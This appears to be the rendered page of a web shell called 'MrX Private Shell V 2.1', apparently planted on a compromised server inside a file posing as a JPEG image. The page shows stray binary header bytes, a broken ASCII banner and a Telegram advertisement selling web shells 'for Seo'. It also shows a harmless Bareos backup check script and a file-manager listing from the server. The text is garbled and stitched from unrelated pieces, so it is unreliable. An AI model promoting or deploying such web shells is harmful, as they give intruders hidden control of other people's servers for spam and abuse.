����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#
# Check Bareos configuration
LogPrint "Bareos: checking requirements ..."
if ! bareos-fd -t; then
Error "bareos-fd: configuration invalid"
fi
if ! systemctl start bareos-fd.service; then
Error "Failed to start bareos-fd.service"
fi
if ! bconsole -t; then
Error "Bareos bconsole configuration invalid"
fi
# status is good or it errors out
bareos_ensure_client_is_available "$BAREOS_CLIENT"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 040_prepare_environment_vars.sh | File | 390 B | 0644 |
|
| 050_check_requirements.sh | File | 408 B | 0644 |
|